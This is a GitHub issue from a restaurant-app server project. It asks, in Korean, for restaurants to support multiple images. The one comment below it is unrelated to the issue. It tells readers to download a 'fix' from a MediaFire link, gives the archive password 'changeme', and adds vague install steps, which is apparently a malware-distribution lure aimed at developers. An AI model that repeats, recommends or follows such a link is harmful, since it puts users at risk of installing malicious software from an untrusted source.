### ISSUE TITLE
[FIX] 레스토랑 이미지 여러개 받을 수 있도록 변경

### ISSUE THREAD

**Issue by eundeang** [CHEFLEA/Cheflea-Server#50]
## Description
레스토랑 이미지 여러개 받을 수 있도록 변경

## To-Do
- [ ]

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
